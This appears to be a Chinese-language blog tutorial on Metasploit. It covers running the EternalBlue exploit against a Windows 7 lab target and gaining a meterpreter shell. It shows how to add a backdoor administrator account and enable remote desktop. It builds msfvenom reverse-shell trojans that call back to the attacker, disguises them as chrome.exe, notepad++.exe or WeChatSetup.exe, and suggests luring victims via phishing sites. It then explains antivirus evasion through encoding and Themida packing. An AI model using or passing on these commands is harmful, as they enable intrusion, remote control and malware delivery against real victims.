文章目录
- 一、metasploit 是什么?
- 二、metasploit 攻击 windows 操作系统
- 三、metasploit 攻击永恒之蓝全流程
- 四、metasploit 攻击成功后能做什么
- 4.1、操作步骤
- 4.2、攻击示例
- 五、msfvenom 绕过杀毒软件技巧
- 5.1、捆绑木马
- 5.2、加壳:压缩壳、加密壳
- 5.2.1、Themida:加壳软件
- 5.2.1.1、Linux 下安装 Themida
- 5.2.1.2、windows 下安装 Themida
- 5.2.1.2、Themida 使用教程
包括 metasploit 是什么?、metasploit 攻击 windows 操作系统、metasploit 攻击永恒之蓝全流程、使用 Kali 渗透工具生成远控木马、metasploit 攻击示例、msfvenom 绕过杀毒软件技巧之捆绑木马、msfvenom 绕过杀毒软件技巧之加壳、windows 下安装 Themida、Themida 使用教程。
一、metasploit 是什么?
Kali 最强渗透工具 - metasploit
-
msf 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的 shellcode,并持续保持更新
-
metasploit 让复杂的漏洞攻击流程变的非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击
二、metasploit 攻击 windows 操作系统
1、msfconsole:启动 metasploit 命令行 [命令行效率高,使用方便]
2、启动 metasploit 前需要做:
-
打开 kali 终端
-
使用 sudo su 命令,并输入 kali 的密码 kali,切换至 root 用户
-
使用 msfdb init 命令初始化 metasploit 数据库(*可选)
3、操作步骤:
(1)、sudo su 切换到超级管理员 root 用户,密码 kali(无 root 用户需自行创建一个)
- sudo su
(2)、msfconsole 启动 metasploit 命令行界面
- msfconsole
三、metasploit 攻击永恒之蓝全流程
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件
1、使用模块:use exploit/windows/smb/ms17_010_eternalblue
2、设置必选项:查看必选项 [*required 为 yes 的就是必选项] show options
3、操作步骤
(1)、可以使用编号进行搜索模块,永恒之蓝编号被微软定义为 ms17_010
- search ms17_010
- exploit:漏洞攻击脚本
如图,可以通过 Description 查看模块是干什么的
(2)、使用模块
两种方法:
-
use 模块名称
-
use 模块编号
(3)、配置(设置)模块,可以先查看有哪些设置,告诉 msf 攻击谁,要干啥
- show options
-
Required(必选项):只需要配置必选项为 yes 的即可
-
RHOSTS:地址
-
RPORT:端口,默认445
-
VERIFY_ARCH、VERIFY_TARGET:这两选项已经是配置好的,保持默认即可
-
Payload options:攻击载荷,默认 windows/x64/meterpreter/reverse_tcp:获取到目标机器的命令执行权限;攻击之后,你想干啥
-
EXITFUNC:默认已经配置好
-
LHOST:监听地址,攻击机的ip地址
-
LPORT:监听端口
(4)、启动靶机,win 7
-
靶机安装参考:https://blog.csdn.net/qq_45138120/article/details/131350059
-
靶机为 VMware 下的 Windows 虚拟机,Windows 版本无所谓
(5)、打开 cmd,使用 ipconfig 查看靶机 ip 地址
- ipconfig
(6)、kali 设置攻击靶机地址
- set RHOSTS 靶机ip
(7)、设置完毕后,可以再次使用 show options 查看是否配置齐全
- show options
如图:查看 Required 配置项为 yes 的 Current Setting 当前设置是否为空,不为空即配置完毕
(8)、可以修改下默认的 LHOST 端口
- set lport 22222
注:端口范围 0-65535
扩展:查看端口是否开放
① 查看445端口是否开启
- netstat -an
② 此处攻击靶机一定要关闭防火墙
(9)、运行模块
- run
如图,会自动进行攻击靶机,并且获取命名执行权限。攻击成功后,先打印 WIN 并进入 meterpreter
meterpreter:拿到了 Win 7 靶机的权限
(10)、可以使用 help 查看可以使用的命令
-
Command:命令
-
Description:命令的描述或解释
-
shutdown:关机
-
User interface Commands:用户接口命令
-
getdesktop:截图
-
keyscna:发送键盘指令
-
mouse:发送鼠标指令
(11)、退出
- exit
四、metasploit 攻击成功后能做什么
1、攻击成功后能做什么
-
meterpreter 是强大的后渗透模块,可以输入 help 查看帮助信息
-
远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统…这些看起来非常复杂又高级的操作都能用 meterpreter 中一行或几个字母,简单的命令完成
-
例:创建后门用户并开启远程连接
-
shell
-
net user zhangsan 123456 /add && net localgroup administrators zhangsan /add
-
exit
-
run getgui -e
-
2、使用 Kali 渗透工具生成远控木马
(1)、msfvenom 是用来生成后门的软件,在目标机上执行后门,在本地监听上线
-
venom:毒,毒液
-
[* msfvenom 在 shell 里使用,不是 msfconsole 终端]
(2)、windows 可执行程序后门:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 Iport=9999 -f exe -o demo.exe
-
msfvenom:执行使用的工具
-
-p:payload
-
windows/x64/meterpreter/reverse_tcp:payload_name 系统/架构/作用/方式;如果要攻击 Linux,将 windows 换成 Linux 即可(android,mac)
-
lhost=192.168.123.136 Iport=9999:payload设置(kali 地址,kali 端口)
-
-f:format
-
exe:exe,windows 可执行文件(ipk,jar,war)
-
-o:output,输入的文件名,如 demo.exe
4.1、操作步骤
(1)、生成木马文件
- msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 Iport=9999 -f exe -o demo.exe
(2)、如图,文件生成在当前路径下
-
可以使用 ls 进行查看
-
可以使用 pwd 查看工作目录的绝对路径
(3)、可以使用钓鱼网站等诱骗受害人点击
(4)、将木马下载到本地,demo.exe
拉取到本地时,一定要关闭杀毒软件
木马病毒下载到本地会被杀毒软件截取,后续需要让木马绕过杀毒软件
木马病毒不可以直接运行,就跟钓鱼一样,需要将木马放在鱼钩上
(5)、终端控制台进入 msfconsole
- msfconsole
(6)、使用 exploit/multi/handler 模块
- use exploit/multi/handler
(7)、查看设置
-
show options
-
可简写:options
- Payload options:攻击载荷设置(设置成生成可执行程序后门时设置的 playload_name)
(8)、设置攻击载荷设置(设置成生成可执行程序后门时设置的 playload_name)
- set payload windows/x64/meterpreter/reverse_tcp
(9)、设置 kali 地址
- set lhost 192.168.159.128
(10)、设置端口(设置成生成可执行程序后门时设置的 Iport,必须一致)
- set lport 9999
(11)、可以使用 options 再次查看设置信息
(12)、运行
- run
现在鱼钩已经扔河里了,等待鱼儿上钩,有两种方法:1、将鱼儿摁在勾上,利用漏洞;2、姜太公钓鱼,愿者上钩。诱导鱼儿上钩
(13)、假如受害者上钩,双击本地的 deom.exe 文件
(14)、如图,受害者已上钩
- meterpreter:获取到受害者电脑的执行权限
(15)、输入 help,查看可以执行的命令操作
- help
4.2、攻击示例
(1)、webcam_list,查看受害者电脑是否有摄像头
- webcam_list
(2)、我使用的是台式机,所以没有摄像头
五、msfvenom 绕过杀毒软件技巧
最基础的免杀 [ 对于其他杀毒软件效果不同,具体情况请自行尝试]*
5.1、捆绑木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x notepad++.exe -o notepad++.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x chrome.exe -o chrome.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x firefox.exe -o firefox.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -o firefox.exe
- -x:模板(要使用哪一个正常程序的模板作为后门的生成)
注:如果 notepad++ 过不了,可以换其它软件;路径下必须存在可执行程序
- -e /指定编码方式对攻击载荷进行重新编码
- -x /指定木马捆绑在哪个可执行程序模板上
- -i /指定对目标进行编码的次数,多次编码理论上有助于免杀的实现
- -f /指定 msf 编码器输出程序的格式
- -o /指定处理完毕后的文件输出路径
注:使用捆绑木马时,路径下必须存在可执行程序
(1)、在生成木马的路径下,先复制一个可执行程序过去,比如:chrome.exe
(2)、使用 msfvenom 生成一个 Windows 环境下的木马,并捆绑到 chrome.exe 上生成 chrome01.exe 的合成马
- msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x chrome.exe -o chrome01.exe
其它示例:
- msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe
x86/shikata_ga_nai 进行多次编码的方式进行免杀处理
(3)、在此路径下,可以看到生成一个 chrome01.exe 的木马
5.2、加壳:压缩壳、加密壳
5.2.1、Themida:加壳软件
5.2.1.1、Linux 下安装 Themida
-
Themida Linux下rar包 百度网盘下载链接:https://pan.baidu.com/s/1v6q8y0Xg-SXMUXX4roEyJg?pwd=8fr8
-
提取码:8fr8
注:此压缩包 rar包,必须在 Linux 系统下进行解压,使用需要在 windows 下使用
扩展:解压rar包
(1)、安装 rar 包教程参考:https://blog.csdn.net/weixin_40293999/article/details/122733513
(2)、解压rar包
5.2.1.2、windows 下安装 Themida
-
Themida windows下文件夹百度网盘下载链接:https://pan.baidu.com/s/1vGaNf92vzUZbsMlzMwXNFA?pwd=sfcx
-
提取码:sfcx
-
下载后得到名为 Themida_x32_x64_v3.0.4.0_Repacked 的文件夹
5.2.1.2、Themida 使用教程
(1)、打开下载后的 Themida_x32_x64_v3.0.4.0_Repacked 文件夹,双击 Themida.exe 执行文件
(2)、将未加壳的木马可执行程序拉到 Themida 软件中
- 也可以在 Themida 软件中选择导入的木马文件路径
(3)、点击 Protext 进行加壳
自动进行加壳保护,成功后,在本地会生成一个添加 Protext 名称的文件